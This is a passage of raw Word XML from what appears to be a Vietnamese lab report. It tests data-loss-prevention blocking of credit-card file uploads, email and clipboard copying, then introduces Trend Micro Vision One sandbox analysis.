            <wp:extent cx="5631873" cy="3041015"/>
            <wp:effectExtent l="19050" t="19050" r="26035" b="26035"/>
            <wp:docPr id="1215281412" name="Picture 121528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32614" cy="3041415"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E322759" w14:textId="79E75E75" w:rsidR="004F2D43" w:rsidRPr="006F3966" w:rsidRDefault="004F2D43"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Có thể thấy lúc này source là file zip những vẫn không upload được.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F711E96" w14:textId="06F13347" w:rsidR="00091FEE" w:rsidRPr="006F3966" w:rsidRDefault="00A25D8B" w:rsidP="006F3966">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F3966">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Gửi dữ liệu lên credit card lên Gmail</w:t>
      </w:r>
      <w:r w:rsidR="0070754B" w:rsidRPr="006F3966">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B8F55A" w14:textId="2708A0DE" w:rsidR="004F2D43" w:rsidRPr="006F3966" w:rsidRDefault="004F2D43"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Kiểm tra bằng cách gửi 1 mail có đính kèm file ở trên:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0EDC32" w14:textId="74CD9D31" w:rsidR="004F2D43" w:rsidRPr="006F3966" w:rsidRDefault="00B02C68" w:rsidP="006F3966">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B02C68">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="561924D0" wp14:editId="23AEE9DF">
            <wp:extent cx="5493327" cy="2897505"/>
            <wp:effectExtent l="19050" t="19050" r="12700" b="17145"/>
            <wp:docPr id="1448264641" name="Picture 144826464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4641" name="Hình ảnh 1" descr="Ảnh có chứa văn bản, ảnh chụp màn hình, phần mềm, Biểu tượng máy tính&#10;&#10;Mô tả được tạo tự động"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId81"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5495431" cy="2898615"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="48ECFDEF" w14:textId="59BFC575" w:rsidR="00B02C68" w:rsidRPr="006F3966" w:rsidRDefault="00B02C68"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Có thể thấy dữ li</w:t>
      </w:r>
      <w:r w:rsidR="00A2391F" w:rsidRPr="006F3966">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ệu upload lên đã bị chặn, tiến hành kiểm tra log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E19D2D5" w14:textId="0FC58828" w:rsidR="00B05987" w:rsidRPr="006F3966" w:rsidRDefault="00B05987" w:rsidP="006F3966">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="08B428CA" wp14:editId="146C865E">
            <wp:extent cx="5492750" cy="2895600"/>
            <wp:effectExtent l="19050" t="19050" r="12700" b="19050"/>
            <wp:docPr id="964645167" name="Picture 96464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4544" cy="2896546"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DCD9FBC" w14:textId="0C788774" w:rsidR="00A25D8B" w:rsidRPr="006F3966" w:rsidRDefault="00A25D8B" w:rsidP="006F3966">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F3966">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Copy</w:t>
      </w:r>
      <w:r w:rsidR="0070754B" w:rsidRPr="006F3966">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> dữ liệu</w:t>
      </w:r>
      <w:r w:rsidR="0070754B" w:rsidRPr="006F3966">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD8969D" w14:textId="674418ED" w:rsidR="00B05987" w:rsidRPr="006F3966" w:rsidRDefault="00B4092D"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Thử copy và paste nội dung bên trong file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBC9B96" w14:textId="1978FF08" w:rsidR="00970B4F" w:rsidRPr="006F3966" w:rsidRDefault="00970B4F" w:rsidP="006F3966">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00970B4F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="573EEEC0" wp14:editId="1F15EB76">
            <wp:extent cx="5354782" cy="2893410"/>
            <wp:effectExtent l="19050" t="19050" r="17780" b="21590"/>
            <wp:docPr id="1228813223" name="Picture 1228813223"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3223" name="Hình ảnh 1" descr="Ảnh có chứa văn bản, phần mềm, ảnh chụp màn hình, Biểu tượng máy tính&#10;&#10;Mô tả được tạo tự động"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId83"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5362659" cy="2897667"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B5B586" w14:textId="2917A4B2" w:rsidR="00014E76" w:rsidRPr="006F3966" w:rsidRDefault="00014E76"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Khi này dữ liệu sẽ không được copy, tiến hành kiểm tra log:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46287FAB" w14:textId="49826F95" w:rsidR="00014E76" w:rsidRPr="006F3966" w:rsidRDefault="00D9148A" w:rsidP="006F3966">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7907BA7B" wp14:editId="66916CDD">
            <wp:extent cx="5375564" cy="2902585"/>
            <wp:effectExtent l="19050" t="19050" r="15875" b="12065"/>
            <wp:docPr id="1640441299" name="Picture 16404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79598" cy="2904763"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA8CBEF" w14:textId="56E02F11" w:rsidR="00B711B0" w:rsidRPr="006F3966" w:rsidRDefault="003B6B8A" w:rsidP="006F3966">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F3966">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Có thể thấy Chanel Clipboard là những nội dung được copy đã bị block.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106C766F" w14:textId="096953C2" w:rsidR="005508CF" w:rsidRPr="009104F8" w:rsidRDefault="004E2A1D" w:rsidP="006F3966">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Toc152795846"/>
      <w:r w:rsidRPr="009104F8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Phân tích</w:t>
      </w:r>
      <w:r w:rsidR="00B711B0" w:rsidRPr="009104F8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> bằng Sandbox trong Trend Micro Vision One (mở rộng)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w14:paraId="58562547" w14:textId="000E63C8" w:rsidR="009E21E4" w:rsidRPr="006F3966" w:rsidRDefault="00C34897" w:rsidP="00E6744B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F3966">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Trend Micro Vision One là </w:t>
      </w:r>
      <w:r w:rsidR="00B02F6B" w:rsidRPr="006F3966">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>một nền tảng phòng thủ</w:t>
      </w:r>
      <w:r w:rsidR="001206C7" w:rsidRPr="006F3966">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, ứng phó</w:t>
      </w:r>
      <w:r w:rsidR="00B02F6B" w:rsidRPr="006F3966">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> các mối đe dọa</w:t>
      </w:r>
      <w:r w:rsidR="007E0ACE" w:rsidRPr="006F3966">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, Vision One là </w:t>
      </w:r>
      <w:r w:rsidR="00512CAB" w:rsidRPr="006F3966">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>một gi</w:t>
      </w:r>
      <w:r w:rsidR="003A4AEF" w:rsidRPr="006F3966">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ải</w:t>
      </w:r>
      <w:r w:rsidR="00512CAB" w:rsidRPr="006F3966">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> pháp </w:t>
      </w:r>
      <w:r w:rsidR="00771423" w:rsidRPr="006F3966">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>hybrid kết hợp giữa ASM</w:t>
      </w:r>
      <w:r w:rsidR="001C14BE" w:rsidRPr="006F3966">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B55EA3" w:rsidRPr="006F3966">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">(Attack Surface Management) và </w:t>
      </w:r>
      <w:r w:rsidR="003A4AEF" w:rsidRPr="006F3966">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>XDR</w:t>
      </w:r>
      <w:r w:rsidR="001C14BE" w:rsidRPr="006F3966">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003A4AEF" w:rsidRPr="006F3966">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="009E21E4" w:rsidRPr="006F3966">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Extended Detection and Response</w:t>
      </w:r>
      <w:r w:rsidR="003A4AEF" w:rsidRPr="006F3966">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00512CAB" w:rsidRPr="006F3966">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> được xây dựng trên cloud </w:t>
      </w:r>
      <w:r w:rsidR="009E21E4" w:rsidRPr="006F3966">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598DB31A" w14:textId="7B7ED430" w:rsidR="00905825" w:rsidRDefault="00905825" w:rsidP="00E6744B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Trend Vision One được tạo ra nhằm đáp ứng cho những công việc phòng ngừa, ngăn chặn và ứng phó sự cố.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B37F99" w14:textId="0CBAA35B" w:rsidR="00C50CA5" w:rsidRDefault="00C50CA5" w:rsidP="00E6744B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Ngoài ra Trend Vision One còn có khả năng liên kết đến những giải pháp khác của Trend Micro như Apex One, </w:t>
      </w:r>
      <w:r w:rsidR="00A0278F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Trend Micro Email security, </w:t>
      </w:r>
      <w:r w:rsidR="00402A5D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Tren</w:t>
      </w:r>
      <w:r w:rsidR="00D51B40">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidR="00402A5D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Micro Cloud One</w:t>
      </w:r>
      <w:r w:rsidR="00013124">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>…</w:t>
      </w:r>
      <w:r w:rsidR="00402A5D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> và các thiết bị </w:t>
      </w:r>
      <w:r w:rsidR="00F93C66">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>phần cứng của h</w:t>
      </w:r>
      <w:r w:rsidR="00BA60C1">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ãng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F920B20" w14:textId="56261A98" w:rsidR="00CF33B8" w:rsidRDefault="00CF33B8" w:rsidP="00E6744B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Trong phần thử nghiệm mở rộng này, nhóm sẽ thử nghiệm </w:t>
      </w:r>
      <w:r w:rsidR="008371A4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>giả pháp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001B4AEA">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Threat </w:t>
      </w:r>
      <w:r w:rsidR="003069FE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Intelligence </w:t>
      </w:r>
      <w:r w:rsidR="006665BE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>với chức năng Sandbox Analys</w:t>
      </w:r>
      <w:r w:rsidR="008A1F95">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>is của Vision One.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8013C8" w14:textId="38E4AA65" w:rsidR="008A1F95" w:rsidRDefault="00F008F6" w:rsidP="00E6744B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Trên giao diện của Vision One chọn Threat Intell</w:t>
      </w:r>
      <w:r w:rsidR="001C14BE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>igence -&gt; Sandbox Analysis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75BE3421" w14:textId="05C2BD85" w:rsidR="004929A1" w:rsidRPr="00E6744B" w:rsidRDefault="001C14BE" w:rsidP="00E6744B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C14BE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5E08F403" wp14:editId="2E9DF548">
            <wp:extent cx="5943600" cy="2822575"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="15875"/>
            <wp:docPr id="255026140" name="Picture 255026140"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6140" name="Hình ảnh 1" descr="Ảnh có chứa ảnh chụp màn hình, văn bản, Phần mềm đa phương tiện, phần mềm&#10;&#10;Mô tả được tạo tự động"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId85"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2822575"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE0C955" w14:textId="2E5804FD" w:rsidR="00B711B0" w:rsidRPr="00E6744B" w:rsidRDefault="004929A1" w:rsidP="00E6744B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E6744B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Chọn Submit Object -&gt; File hoặc Urls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AEDA713" w14:textId="2126EC2C" w:rsidR="004929A1" w:rsidRPr="00E6744B" w:rsidRDefault="004929A1" w:rsidP="00E6744B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004929A1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A7E9C56" wp14:editId="454C4731">
            <wp:extent cx="5943600" cy="1453515"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="13335"/>
            <wp:docPr id="231065561" name="Picture 231065561"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65561" name="Hình ảnh 1" descr="Ảnh có chứa văn bản, phần mềm, Phần mềm đa phương tiện, Phần mềm đồ họa&#10;&#10;Mô tả được tạo tự động"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId86"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1453515"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="562FBC54" w14:textId="4083553B" w:rsidR="004929A1" w:rsidRPr="00E6744B" w:rsidRDefault="004929A1" w:rsidP="00E6744B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
